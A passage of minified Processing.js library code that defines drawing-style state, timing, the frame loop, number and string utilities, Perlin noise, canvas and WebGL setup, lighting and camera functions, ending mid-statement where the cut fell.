d7={doFill:aF,currentFillColor:aX,doStroke:cd,currentStrokeColor:cu,curTint:bb,curRectMode:bI,curColorMode:cX,colorModeX:bG,colorModeZ:bD,colorModeY:bF,colorModeA:bR,curTextFont:U,horizontalTextAlignment:L,verticalTextAlignment:c0,textMode:cH,curFontName:W,curTextSize:dW,curTextAscent:aZ,curTextDescent:dx,curTextLeading:d3};bj.push(d7)};cV.popStyle=function(){var d7=bj.pop();if(d7){cO();cV.popMatrix();aF=d7.doFill;aX=d7.currentFillColor;cd=d7.doStroke;cu=d7.currentStrokeColor;bb=d7.curTint;bI=d7.curRectmode;cX=d7.curColorMode;bG=d7.colorModeX;bD=d7.colorModeZ;bF=d7.colorModeY;bR=d7.colorModeA;U=d7.curTextFont;W=d7.curFontName;dW=d7.curTextSize;L=d7.horizontalTextAlignment;c0=d7.verticalTextAlignment;cH=d7.textMode;aZ=d7.curTextAscent;dx=d7.curTextDescent;d3=d7.curTextLeading}else{throw"Too many popStyle() without enough pushStyle()"}};cV.year=function(){return(new Date).getFullYear()};cV.month=function(){return(new Date).getMonth()+1};cV.day=function(){return(new Date).getDate()};cV.hour=function(){return(new Date).getHours()};cV.minute=function(){return(new Date).getMinutes()};cV.second=function(){return(new Date).getSeconds()};cV.millis=function(){return Date.now()-dm};function cs(){var d7=(Date.now()-dq)/1000;N++;var d8=N/d7;if(d7>0.5){dq=Date.now();N=0;cV.__frameRate=d8}cV.frameCount++}bO.prototype.redraw=function(){cs();d4.lineWidth=dS;var d7=cV.pmouseX,d8=cV.pmouseY;cV.pmouseX=dJ;cV.pmouseY=d1;aC();cV.draw();cO();dJ=cV.mouseX;d1=cV.mouseY;cV.pmouseX=d7;cV.pmouseY=d8};by.prototype.redraw=function(){cs();var d7=cV.pmouseX,d8=cV.pmouseY;cV.pmouseX=dJ;cV.pmouseY=d1;d4.clear(d4.DEPTH_BUFFER_BIT);dz={attributes:{},locations:{}};cV.noLights();cV.lightFalloff(1,0,0);cV.shininess(1);cV.ambient(255,255,255);cV.specular(0,0,0);cV.emissive(0,0,0);cV.camera();cV.draw();dJ=cV.mouseX;d1=cV.mouseY;cV.pmouseX=d7;cV.pmouseY=d8};cV.noLoop=function(){aB=false;aw=false;clearInterval(b3);cP.onPause()};cV.loop=function(){if(aw){return}dq=Date.now();N=0;b3=B.setInterval(function(){try{cP.onFrameStart();cV.redraw();cP.onFrameEnd()}catch(d7){B.clearInterval(b3);throw d7}},ay);aB=true;aw=true;cP.onLoop()};cV.frameRate=function(d7){dQ=d7;ay=1000/dQ;if(aB){cV.noLoop();cV.loop()}};var at=[];function bM(d9,d8,d7){if(d9.addEventListener){d9.addEventListener(d8,d7,false)}else{d9.attachEvent("on"+d8,d7)}at.push({elem:d9,type:d8,fn:d7})}function dd(d7){var ea=d7.elem,d9=d7.type,d8=d7.fn;if(ea.removeEventListener){ea.removeEventListener(d9,d8,false)}else{if(ea.detachEvent){ea.detachEvent("on"+d9,d8)}}}cV.exit=function(){B.clearInterval(b3);J(cV.externals.canvas.id);for(var d8 in D.lib){if(D.lib.hasOwnProperty(d8)){if(D.lib[d8].hasOwnProperty("detach")){D.lib[d8].detach(cV)}}}var d7=at.length;while(d7--){dd(at[d7])}cP.onExit()};cV.cursor=function(){if(arguments.length>1||arguments.length===1&&arguments[0] instanceof cV.PImage){var ea=arguments[0],d7,ec;if(arguments.length>=3){d7=arguments[1];ec=arguments[2];if(d7<0||ec<0||ec>=ea.height||d7>=ea.width){throw"x and y must be non-negative and less than the dimensions of the image"}}else{d7=ea.width>>>1;ec=ea.height>>>1}var d8=ea.toDataURL();var d9='url("'+d8+'") '+d7+" "+ec+", default";X=ac.style.cursor=d9}else{if(arguments.length===1){var eb=arguments[0];X=ac.style.cursor=eb}else{X=ac.style.cursor=cj}}};cV.noCursor=function(){X=ac.style.cursor=z.NOCURSOR};cV.link=function(d7,d8){if(d8!==r){B.open(d7,d8)}else{B.location=d7}};cV.beginDraw=E;cV.endDraw=E;bO.prototype.toImageData=function(d7,ea,d8,d9){d7=d7!==r?d7:0;ea=ea!==r?ea:0;d8=d8!==r?d8:cV.width;d9=d9!==r?d9:cV.height;return d4.getImageData(d7,ea,d8,d9)};by.prototype.toImageData=function(ef,ee,eg,eb){ef=ef!==r?ef:0;ee=ee!==r?ee:0;eg=eg!==r?eg:cV.width;eb=eb!==r?eb:cV.height;var ed=d.createElement("canvas"),eh=ed.getContext("2d"),ea=eh.createImageData(eg,eb),d8=new b(eg*eb*4);d4.readPixels(ef,ee,eg,eb,d4.RGBA,d4.UNSIGNED_BYTE,d8);for(var d9=0,ec=d8.length,d7=ea.data;d9<ec;d9++){d7[d9]=d8[(eb-1-o.floor(d9/4/eg))*eg*4+d9%(eg*4)]}return ea};cV.status=function(d7){B.status=d7};cV.binary=function(d8,d9){var ea;if(d9>0){ea=d9}else{if(d8 instanceof bN){ea=16;d8|=0}else{ea=32;while(ea>1&&!(d8>>>ea-1&1)){ea--}}}var d7="";while(ea>0){d7+=d8>>>--ea&1?"1":"0"}return d7};cV.unbinary=function(d8){var ea=d8.length-1,d9=1,d7=0;while(ea>=0){var eb=d8[ea--];if(eb!=="0"&&eb!=="1"){throw"the value passed into unbinary was not an 8 bit binary number"}if(eb==="1"){d7+=d9}d9<<=1}return d7};function cW(ej,eh,eb,em,ed,ek){var d9=ej<0?eb:eh;var d8=ed===0;var ei=ed===r||ed<0?0:ed;var eg=o.abs(ej);if(d8){ei=1;eg*=10;while(o.abs(o.round(eg)-eg)>0.000001&&ei<7){++ei;eg*=10}}else{if(ei!==0){eg*=o.pow(10,ei)}}var ea,ef=eg*2;if(o.floor(eg)===eg){ea=eg}else{if(o.floor(ef)===ef){var d7=o.floor(eg);ea=d7+d7%2}else{ea=o.round(eg)}}var ec="";var el=em+ei;while(el>0||ea>0){el--;ec=""+ea%10+ec;ea=o.floor(ea/10)}if(ek!==r){var ee=ec.length-3-ei;while(ee>0){ec=ec.substring(0,ee)+ek+ec.substring(ee);ee-=3}}if(ei>0){return d9+ec.substring(0,ec.length-ei)+"."+ec.substring(ec.length-ei,ec.length)}return d9+ec}function an(ed,ec,d7,ef,d8,ee){if(ed instanceof Array){var ea=[];for(var d9=0,eb=ed.length;d9<eb;d9++){ea.push(cW(ed[d9],ec,d7,ef,d8,ee))}return ea}return cW(ed,ec,d7,ef,d8,ee)}cV.nf=function(d9,d7,d8){return an(d9,"","-",d7,d8)};cV.nfs=function(d9,d7,d8){return an(d9," ","-",d7,d8)};cV.nfp=function(d9,d7,d8){return an(d9,"+","-",d7,d8)};cV.nfc=function(d9,d7,d8){return an(d9,"","-",d7,d8,",")};var aK=function(d9,d8){d8=d8===r||d8===null?d8=8:d8;if(d9<0){d9=4294967295+d9+1}var d7=Number(d9).toString(16).toUpperCase();while(d7.length<d8){d7="0"+d7}if(d7.length>=d8){d7=d7.substring(d7.length-d8,d7.length)}return d7};cV.hex=function(d8,d7){if(arguments.length===1){if(d8 instanceof bN){d7=4}else{d7=8}}return aK(d8,d7)};function dB(d7){var d8=parseInt("0x"+d7,16);if(d8>2147483647){d8-=4294967296}return d8}cV.unhex=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(dB(d9[d8]))}return d7}return dB(d9)};cV.loadStrings=function(d8){if(localStorage[d8]){return localStorage[d8].split("\n")}var d7=u(d8);if(typeof d7!=="string"||d7===""){return[]}d7=d7.replace(/(\r\n?)/g,"\n").replace(/\n$/,"");return d7.split("\n")};cV.saveStrings=function(d8,d7){localStorage[d8]=d7.join("\n")};cV.loadBytes=function(d9){var d8=u(d9);var d7=[];for(var ea=0;ea<d8.length;ea++){d7.push(d8.charCodeAt(ea))}return d7};function a8(d7){return Array.prototype.slice.call(d7,1)}cV.matchAll=function(d8,d7){var ea=[],d9;var eb=new RegExp(d7,"g");while((d9=eb.exec(d8))!==null){ea.push(d9);if(d9[0].length===0){++eb.lastIndex}}return ea.length>0?ea:null};cV.__contains=function(d8,d7){if(typeof d8!=="string"){return d8.contains.apply(d8,a8(arguments))}return d8!==null&&d7!==null&&typeof d7==="string"&&d8.indexOf(d7)>-1};cV.__replaceAll=function(d7,d9,d8){if(typeof d7!=="string"){return d7.replaceAll.apply(d7,a8(arguments))}return d7.replace(new RegExp(d9,"g"),d8)};cV.__replaceFirst=function(d7,d9,d8){if(typeof d7!=="string"){return d7.replaceFirst.apply(d7,a8(arguments))}return d7.replace(new RegExp(d9,""),d8)};cV.__replace=function(ea,ec,eb){if(typeof ea!=="string"){return ea.replace.apply(ea,a8(arguments))}if(ec instanceof RegExp){return ea.replace(ec,eb)}if(typeof ec!=="string"){ec=ec.toString()}if(ec===""){return ea}var d9=ea.indexOf(ec);if(d9<0){return ea}var d8=0,d7="";do{d7+=ea.substring(d8,d9)+eb;d8=d9+ec.length}while((d9=ea.indexOf(ec,d8))>=0);return d7+ea.substring(d8)};cV.__equals=function(d8,d7){if(d8.equals instanceof Function){return d8.equals.apply(d8,a8(arguments))}return d8.valueOf()===d7.valueOf()};cV.__equalsIgnoreCase=function(d8,d7){if(typeof d8!=="string"){return d8.equalsIgnoreCase.apply(d8,a8(arguments))}return d8.toLowerCase()===d7.toLowerCase()};cV.__toCharArray=function(d9){if(typeof d9!=="string"){return d9.toCharArray.apply(d9,a8(arguments))}var ea=[];for(var d8=0,d7=d9.length;d8<d7;++d8){ea[d8]=new bN(d9.charAt(d8))}return ea};cV.__split=function(ea,eb,d8){if(typeof ea!=="string"){return ea.split.apply(ea,a8(arguments))}var ed=new RegExp(eb);if(d8===r||d8<1){return ea.split(ed)}var d7=[],ec=ea,ee;while((ee=ec.search(ed))!==-1&&d7.length<d8-1){var d9=ed.exec(ec).toString();d7.push(ec.substring(0,ee));ec=ec.substring(ee+d9.length)}if(ee!==-1||ec!==""){d7.push(ec)}return d7};cV.__codePointAt=function(ea,d8){var eb=ea.charCodeAt(d8),d9,d7;if(55296<=eb&&eb<=56319){d9=eb;d7=ea.charCodeAt(d8+1);return(d9-55296)*1024+(d7-56320)+65536}return eb};cV.match=function(d8,d7){return d8.match(d7)};cV.__startsWith=function(d7,d9,d8){if(typeof d7!=="string"){return d7.startsWith.apply(d7,a8(arguments))}d8=d8||0;if(d8<0||d8>d7.length){return false}return d9===""||d9===d7?true:d7.indexOf(d9)===d8};cV.__endsWith=function(d8,d9){if(typeof d8!=="string"){return d8.endsWith.apply(d8,a8(arguments))}var d7=d9?d9.length:0;return d9===""||d9===d8?true:d8.indexOf(d9)===d8.length-d7};cV.__hashCode=function(d7){if(d7.hashCode instanceof Function){return d7.hashCode.apply(d7,a8(arguments))}return h(d7)};cV.__printStackTrace=function(d7){cV.println("Exception: "+d7.toString())};var d6=[];cV.println=function(d7){var d8=d6.length;if(d8){D.logger.log(d6.join(""));d6.length=0}if(arguments.length===0&&d8===0){D.logger.log("")}else{if(arguments.length!==0){D.logger.log(d7)}}};cV.print=function(d7){d6.push(d7)};cV.str=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(d9[d8].toString()+"")}return d7}return d9.toString()+""};cV.trim=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(d9[d8].replace(/^\s*/,"").replace(/\s*$/,"").replace(/\r*$/,""))}return d7}return d9.replace(/^\s*/,"").replace(/\s*$/,"").replace(/\r*$/,"")};function aO(d7){if(typeof d7==="number"){return d7!==0}if(typeof d7==="boolean"){return d7}if(typeof d7==="string"){return d7.toLowerCase()==="true"}if(d7 instanceof bN){return d7.code===49||d7.code===84||d7.code===116}}cV.parseBoolean=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(aO(d9[d8]))}return d7}return aO(d9)};cV.parseByte=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(0-(d9[d8]&128)|d9[d8]&127)}return d7}return 0-(d9&128)|d9&127};cV.parseChar=function(d9){if(typeof d9==="number"){return new bN(String.fromCharCode(d9&65535))}if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(new bN(String.fromCharCode(d9[d8]&65535)))}return d7}throw"char() may receive only one argument of type int, byte, int[], or byte[]."};function cN(d7){if(typeof d7==="number"){return d7}if(typeof d7==="boolean"){return d7?1:0}if(typeof d7==="string"){return parseFloat(d7)}if(d7 instanceof bN){return d7.code}}cV.parseFloat=function(d9){if(d9 instanceof Array){var d7=[];for(var d8=0;d8<d9.length;d8++){d7.push(cN(d9[d8]))}return d7}return cN(d9)};function ak(d9,d7){if(typeof d9==="number"){return d9&4294967295}if(typeof d9==="boolean"){return d9?1:0}if(typeof d9==="string"){var d8=parseInt(d9,d7||10);return d8&4294967295}if(d9 instanceof bN){return d9.code}}cV.parseInt=function(ea,d9){if(ea instanceof Array){var d7=[];for(var d8=0;d8<ea.length;d8++){if(typeof ea[d8]==="string"&&!/^\s*[+\-]?\d+\s*$/.test(ea[d8])){d7.push(0)}else{d7.push(ak(ea[d8],d9))}}return d7}return ak(ea,d9)};cV.__int_cast=function(d7){return 0|d7};cV.__instanceof=function(d9,d8){if(typeof d8!=="function"){throw"Function is expected as type argument for instanceof operator"}if(typeof d9==="string"){return d8===Object||d8===String}if(d9 instanceof d8){return true}if(typeof d9!=="object"||d9===null){return false}var eb=d9.constructor;if(d8.$isInterface){var ea=[];while(eb){if(eb.$interfaces){ea=ea.concat(eb.$interfaces)}eb=eb.$base}while(ea.length>0){var d7=ea.shift();if(d7===d8){return true}if(d7.$interfaces){ea=ea.concat(d7.$interfaces)}}return false}while(eb.hasOwnProperty("$base")){eb=eb.$base;if(eb===d8){return true}}return false};cV.abs=o.abs;cV.ceil=o.ceil;cV.constrain=function(d8,d9,d7){return d8>d7?d7:d8<d9?d9:d8};cV.dist=function(){var d9,d8,d7;if(arguments.length===4){d9=arguments[0]-arguments[2];d8=arguments[1]-arguments[3];return o.sqrt(d9*d9+d8*d8)}if(arguments.length===6){d9=arguments[0]-arguments[3];d8=arguments[1]-arguments[4];d7=arguments[2]-arguments[5];return o.sqrt(d9*d9+d8*d8+d7*d7)}};cV.exp=o.exp;cV.floor=o.floor;cV.lerp=function(d8,d7,d9){return(d7-d8)*d9+d8};cV.log=o.log;cV.mag=function(d8,d7,d9){if(d9){return o.sqrt(d8*d8+d7*d7+d9*d9)}return o.sqrt(d8*d8+d7*d7)};cV.map=function(ea,d8,d9,d7,eb){return d7+(eb-d7)*((ea-d8)/(d9-d8))};cV.max=function(){if(arguments.length===2){return arguments[0]<arguments[1]?arguments[1]:arguments[0]}var d8=arguments.length===1?arguments[0]:arguments;if(!("length" in d8&&d8.length>0)){throw"Non-empty array is expected"}var d7=d8[0],ea=d8.length;for(var d9=1;d9<ea;++d9){if(d7<d8[d9]){d7=d8[d9]}}return d7};cV.min=function(){if(arguments.length===2){return arguments[0]<arguments[1]?arguments[0]:arguments[1]}var d7=arguments.length===1?arguments[0]:arguments;if(!("length" in d7&&d7.length>0)){throw"Non-empty array is expected"}var d9=d7[0],ea=d7.length;for(var d8=1;d8<ea;++d8){if(d9>d7[d8]){d9=d7[d8]}}return d9};cV.norm=function(d8,d7,d9){return(d8-d7)/(d9-d7)};cV.pow=o.pow;cV.round=o.round;cV.sq=function(d7){return d7*d7};cV.sqrt=o.sqrt;cV.acos=o.acos;cV.asin=o.asin;cV.atan=o.atan;cV.atan2=o.atan2;cV.cos=o.cos;cV.degrees=function(d7){return d7*180/o.PI};cV.radians=function(d7){return d7/180*o.PI};cV.sin=o.sin;cV.tan=o.tan;var bW=o.random;cV.random=function(){if(arguments.length===0){return bW()}if(arguments.length===1){return bW()*arguments[0]}var d8=arguments[0],d7=arguments[1];return bW()*(d7-d8)+d8};function cn(d9,d8){var eb=d9||362436069,d7=d8||521288629;var ea=function(){eb=36969*(eb&65535)+(eb>>>16)&4294967295;d7=18000*(d7&65535)+(d7>>>16)&4294967295;return((eb&65535)<<16|d7&65535)&4294967295};this.nextDouble=function(){var ec=ea()/4294967296;return ec<0?1+ec:ec};this.nextInt=ea}cn.createRandomized=function(){var d7=new Date;return new cn(d7/60000&4294967295,d7&4294967295)};cV.randomSeed=function(d7){bW=(new cn(d7)).nextDouble};cV.Random=function(d7){var ea=false,d8,d9;this.nextGaussian=function(){if(ea){ea=false;return d8}var ee,ec,eb;do{ee=2*d9()-1;ec=2*d9()-1;eb=ee*ee+ec*ec}while(eb>=1||eb===0);var ed=o.sqrt(-2*o.log(eb)/eb);d8=ec*ed;ea=true;return ee*ed};d9=d7===r?o.random:(new cn(d7)).nextDouble};function dw(ee){var d8=ee!==r?new cn(ee):cn.createRandomized();var ed,eb;var ea=new b(512);for(ed=0;ed<256;++ed){ea[ed]=ed}for(ed=0;ed<256;++ed){var eg=ea[eb=d8.nextInt()&255];ea[eb]=ea[ed];ea[ed]=eg}for(ed=0;ed<256;++ed){ea[ed+256]=ea[ed]}function d7(ek,eh,en,em){var el=ek&15;var ej=el<8?eh:en,ei=el<4?en:el===12||el===14?eh:em;return((el&1)===0?ej:-ej)+((el&2)===0?ei:-ei)}function ec(ej,eh,ek){var ei=(ej&1)===0?eh:ek;return(ej&2)===0?-ei:ei}function ef(ei,eh){return(ei&1)===0?-eh:eh}function d9(ej,ei,eh){return ei+ej*(eh-ei)}this.noise3d=function(et,es,er){var ek=o.floor(et)&255,ei=o.floor(es)&255,eh=o.floor(er)&255;et-=o.floor(et);es-=o.floor(es);er-=o.floor(er);var eo=(3-2*et)*et*et,en=(3-2*es)*es*es,em=(3-2*er)*er*er;var ev=ea[ek]+ei,eq=ea[ev]+eh,ep=ea[ev+1]+eh,eu=ea[ek+1]+ei,el=ea[eu]+eh,ej=ea[eu+1]+eh;return d9(em,d9(en,d9(eo,d7(ea[eq],et,es,er),d7(ea[el],et-1,es,er)),d9(eo,d7(ea[ep],et,es-1,er),d7(ea[ej],et-1,es-1,er))),d9(en,d9(eo,d7(ea[eq+1],et,es,er-1),d7(ea[el+1],et-1,es,er-1)),d9(eo,d7(ea[ep+1],et,es-1,er-1),d7(ea[ej+1],et-1,es-1,er-1))))};this.noise2d=function(eh,eo){var en=o.floor(eh)&255,el=o.floor(eo)&255;eh-=o.floor(eh);eo-=o.floor(eo);var ej=(3-2*eh)*eh*eh,ei=(3-2*eo)*eo*eo;var em=ea[en]+el,ek=ea[en+1]+el;return d9(ei,d9(ej,ec(ea[em],eh,eo),ec(ea[ek],eh-1,eo)),d9(ej,ec(ea[em+1],eh,eo-1),ec(ea[ek+1],eh-1,eo-1)))};this.noise1d=function(eh){var ej=o.floor(eh)&255;eh-=o.floor(eh);var ei=(3-2*eh)*eh*eh;return d9(ei,ef(ea[ej],eh),ef(ea[ej+1],eh-1))}}var bU={generator:r,octaves:4,fallout:0.5,seed:r};cV.noise=function(d7,ee,ed){if(bU.generator===r){bU.generator=new dw(bU.seed)}var ec=bU.generator;var eb=1,d8=1,ea=0;for(var d9=0;d9<bU.octaves;++d9){eb*=bU.fallout;switch(arguments.length){case 1:ea+=eb*(1+ec.noise1d(d8*d7))/2;break;case 2:ea+=eb*(1+ec.noise2d(d8*d7,d8*ee))/2;break;case 3:ea+=eb*(1+ec.noise3d(d8*d7,d8*ee,d8*ed))/2;break}d8*=2}return ea};cV.noiseDetail=function(d8,d7){bU.octaves=d8;if(d7!==r){bU.fallout=d7}};cV.noiseSeed=function(d7){bU.seed=d7;bU.generator=r};dp.prototype.size=function(d8,eb,ea){if(cd){cV.stroke(0)}if(aF){cV.fill(255)}var d9={fillStyle:d4.fillStyle,strokeStyle:d4.strokeStyle,lineCap:d4.lineCap,lineJoin:d4.lineJoin};if(ac.style.length>0){ac.style.removeProperty("width");ac.style.removeProperty("height")}ac.width=cV.width=d8||100;ac.height=cV.height=eb||100;for(var ec in d9){if(d9.hasOwnProperty(ec)){d4[ec]=d9[ec]}}cV.textFont(U);cV.background();bY=o.max(1000,d8*eb*0.05);cV.externals.context=d4;for(var d7=0;d7<720;d7++){ag[d7]=cV.sin(d7*(o.PI/180)*0.5);bi[d7]=cV.cos(d7*(o.PI/180)*0.5)}};bO.prototype.size=function(d7,d9,d8){if(d4===r){d4=ac.getContext("2d");al=new T;c9=new T;dF=new aT;aQ=new aT}dp.prototype.size.apply(this,arguments)};by.prototype.size=function(){var d8=false;return function d7(ea,ec,eb){if(d8){throw"Multiple calls to size() for 3D renders are not allowed."}d8=true;function ed(ef){var ei=["experimental-webgl","webgl","webkit-3d"],eh;for(var eg=0,ee=ei.length;eg<ee;eg++){eh=ef.getContext(ei[eg],{antialias:false});if(eh){break}}return eh}try{ac.width=cV.width=ea||100;ac.height=cV.height=ec||100;d4=ed(ac);c6=d4.createTexture();bP=d4.createTexture()}catch(d9){D.debug(d9)}if(!d4){throw"WebGL context is not supported on this browser."}d4.viewport(0,0,ac.width,ac.height);d4.enable(d4.DEPTH_TEST);d4.enable(d4.BLEND);d4.blendFunc(d4.SRC_ALPHA,d4.ONE_MINUS_SRC_ALPHA);dM=bC(d4,ad,bX);bQ=bC(d4,bS,bf);cV.strokeWeight(1);du=bC(d4,d5,bH);d4.useProgram(du);dV("usingTexture3d",du,"usingTexture",dP);cV.lightFalloff(1,0,0);cV.shininess(1);cV.ambient(255,255,255);cV.specular(0,0,0);cV.emissive(0,0,0);bd=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,bd);d4.bufferData(d4.ARRAY_BUFFER,df,d4.STATIC_DRAW);cI=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,cI);d4.bufferData(d4.ARRAY_BUFFER,de,d4.STATIC_DRAW);di=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,di);d4.bufferData(d4.ARRAY_BUFFER,bE,d4.STATIC_DRAW);aA=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,aA);d4.bufferData(d4.ARRAY_BUFFER,aj,d4.STATIC_DRAW);b1=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,b1);d4.bufferData(d4.ARRAY_BUFFER,ah,d4.STATIC_DRAW);bc=d4.createBuffer();b7=d4.createBuffer();ar=d4.createBuffer();aE=d4.createBuffer();bz=d4.createBuffer();ae=d4.createBuffer();av=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,av);d4.bufferData(d4.ARRAY_BUFFER,new e([0,0,0]),d4.STATIC_DRAW);cG=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,cG);d4.bufferData(d4.ARRAY_BUFFER,new e([1,1,0,-1,1,0,-1,-1,0,1,-1,0]),d4.STATIC_DRAW);aa=d4.createBuffer();d4.bindBuffer(d4.ARRAY_BUFFER,aa);d4.bufferData(d4.ARRAY_BUFFER,new e([0,0,1,0,1,1,0,1]),d4.STATIC_DRAW);P=d4.createBuffer();d4.bindBuffer(d4.ELEMENT_ARRAY_BUFFER,P);d4.bufferData(d4.ELEMENT_ARRAY_BUFFER,new w([0,1,2,2,3,0]),d4.STATIC_DRAW);bT=new aM;cg=new aM;dF=new aM;aQ=new aM;da=new aM;cV.camera();cV.perspective();al=new T;c9=new T;c2=new aM;aN=new aM;aJ=new aM;bw=new aM;cc=new aM;S=new aM;S.set(-1,3,-3,1,3,-6,3,0,-3,3,0,0,1,0,0,0);dp.prototype.size.apply(this,arguments)}}();bO.prototype.ambientLight=dp.prototype.a3DOnlyFunction;by.prototype.ambientLight=function(d7,ea,ef,eg,ec,eb){if(dH===8){throw"can only create "+8+" lights"}var ed=new y(eg,ec,eb);var ee=new aM;ee.scale(1,-1,1);ee.apply(dF.array());ee.mult(ed,ed);var d8=dD(d7,ea,ef,0);var d9=[((d8>>16)&255)/255,((d8&65280)>>>8)/255,(d8&255)/255];d4.useProgram(du);dY("lights.color.3d."+dH,du,"lights"+dH+".color",d9);dY("lights.position.3d."+dH,du,"lights"+dH+".position",ed.array());dV("lights.type.3d."+dH,du,"lights"+dH+".type",0);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.directionalLight=dp.prototype.a3DOnlyFunction;by.prototype.directionalLight=function(d7,ed,ef,ee,ec,eb){if(dH===8){throw"can only create "+8+" lights"}d4.useProgram(du);var eg=new aM;eg.scale(1,-1,1);eg.apply(dF.array());eg=eg.array();var d9=[eg[0]*ee+eg[4]*ec+eg[8]*eb,eg[1]*ee+eg[5]*ec+eg[9]*eb,eg[2]*ee+eg[6]*ec+eg[10]*eb];var d8=dD(d7,ed,ef,0);var ea=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];dY("lights.color.3d."+dH,du,"lights"+dH+".color",ea);dY("lights.position.3d."+dH,du,"lights"+dH+".position",d9);dV("lights.type.3d."+dH,du,"lights"+dH+".type",1);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.lightFalloff=dp.prototype.a3DOnlyFunction;by.prototype.lightFalloff=function(d8,d7,d9){d4.useProgram(du);dY("falloff3d",du,"falloff",[d8,d7,d9])};bO.prototype.lightSpecular=dp.prototype.a3DOnlyFunction;by.prototype.lightSpecular=function(eb,ea,d7){var d8=dD(eb,ea,d7,0);var d9=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];d4.useProgram(du);dY("specular3d",du,"specular",d9)};cV.lights=function(){cV.ambientLight(128,128,128);cV.directionalLight(128,128,128,0,0,-1);cV.lightFalloff(1,0,0);cV.lightSpecular(0,0,0)};bO.prototype.pointLight=dp.prototype.a3DOnlyFunction;by.prototype.pointLight=function(d7,ea,ef,eg,ec,eb){if(dH===8){throw"can only create "+8+" lights"}var ed=new y(eg,ec,eb);var ee=new aM;ee.scale(1,-1,1);ee.apply(dF.array());ee.mult(ed,ed);var d8=dD(d7,ea,ef,0);var d9=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];d4.useProgram(du);dY("lights.color.3d."+dH,du,"lights"+dH+".color",d9);dY("lights.position.3d."+dH,du,"lights"+dH+".position",ed.array());dV("lights.type.3d."+dH,du,"lights"+dH+".type",2);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.noLights=dp.prototype.a3DOnlyFunction;by.prototype.noLights=function(){dH=0;d4.useProgram(du);dV("lightCount3d",du,"lightCount",dH)};bO.prototype.spotLight=dp.prototype.a3DOnlyFunction;by.prototype.spotLight=function(d7,ef,ek,el,ej,eh,eg,ee,ec,eb,ed){if(dH===8){throw"can only create "+8+" lights"}d4.useProgram(du);var ei=new y(el,ej,eh);var em=new aM;em.scale(1,-1,1);em.apply(dF.array());em.mult(ei,ei);em=em.array();var d9=[em[0]*eg+em[4]*ee+em[8]*ec,em[1]*eg+em[5]*ee+em[9]*ec,em[2]*eg+em[6]*ee+em[10]*ec];var d8=dD(d7,ef,ek,0);var ea=[((d8>>16)&255)/255,((d8>>8)&255)/255,(d8&255)/255];dY("lights.color.3d."+dH,du,"lights"+dH+".color",ea);dY("lights.position.3d."+dH,du,"lights"+dH+".position",ei.array());dY("lights.direction.3d."+dH,du,"lights"+dH+".direction",d9);dY("lights.concentration.3d."+dH,du,"lights"+dH+".concentration",ed);dY("lights.angle.3d."+dH,du,"lights"+dH+".angle",eb);dV("lights.type.3d."+dH,du,"lights"+dH+".type",3);dV("lightCount3d",du,"lightCount",++dH)};bO.prototype.beginCamera=function(){throw"beginCamera() is not available in 2D mode"};by.prototype.beginCamera=function(){if(ao){throw"You cannot call beginCamera() again before calling endCamera()"}ao=true;dF=cg;aQ=bT};bO.prototype.endCamera=function(){throw"endCamera() is not available in 2D mode"};by.prototype.endCamera=function(){if(!ao){throw"You cannot call endCamera() before calling beginCamera()"}dF.set(bT);aQ.set(cg);ao=false};cV.camera=function(ei,eh,ef,ed,eb,ea,eq,eo,em){if(ei===r){dj=cV.width/2;dh=cV.height/2;dg=dh/o.tan(cJ/2);ei=dj;eh=dh;ef=dg;ed=dj;eb=dh;ea=0;eq=0;eo=1;em=0}var ec=new y(ei-ed,eh-eb,ef-ea);var ee=new y(eq,eo,em);ec.normalize();var eg=y.cross(ee,ec);ee=y.cross(ec,eg);eg.normalize();ee.normalize();var er=eg.x,ep=eg.y,en=eg.z;var d9=ee.x,d8=ee.y,d7=ee.z;var el=ec.x,ek=ec.y,ej=ec.z;bT.set(er,ep,en,0,d9,d8,d7,0,el,ek,ej,0,0,0,0,1);bT.translate(-ei,-eh,-ef);cg.reset();cg.invApply(er,ep,en,0,d9,d8,d7,0,el,ek,ej,0,0,0,0,1);cg.translate(ei,eh,ef);dF.set(bT);aQ.set(cg)};cV.perspective=function(eb,d9,ec,d8){if(arguments.length===0){dh=ac.height/2;dg=dh/o.tan(cJ/2);aW=dg/10;au=dg*10;b4=cV.width/cV.height;eb=cJ;d9=b4;ec=aW;d8=au}var ed,d7,ee,ea;ed=ec*o.tan(eb/2);d7=-ed;ee=ed*d9;ea=d7*d9;cV.frustum(ea,ee,d7,ed,ec,d8)};bO.prototype.frustum=function(){throw"Processing.js: frustum() is not supported in 2D mode"};by.prototype.frustum=function(ed,d9,d8,ec,eb,d7){ch=true;da=new aM;da.set(2*eb/(d9-ed),0,(d9+ed)/(d9-ed),0,0,2*eb/(ec-d8),(ec+d8)/(ec-d8),0,0,0,-(d7+eb)/(d7-eb),-(2*d7*eb)/(d7-eb),0,0,-1,0);var ea=new aM;ea.set(da);ea.transpose();d4.useProgram(dM);a5("projection2d",dM,"projection",false,ea.array());d4.useProgram(du);a5("projection3d",du,"projection",false,ea.array());d4.useProgram(bQ);a5("uProjectionUS",bQ,"uProjection",false,ea.array())};cV.ortho=function(d8,ej,d7,eh,ee,ed){if(arguments.length===0){d8=0;ej=cV.width;d7=0;eh=cV.height;ee=-10;ed=10}var ei=2/(ej-d8);var eg=2/(eh-d7);var 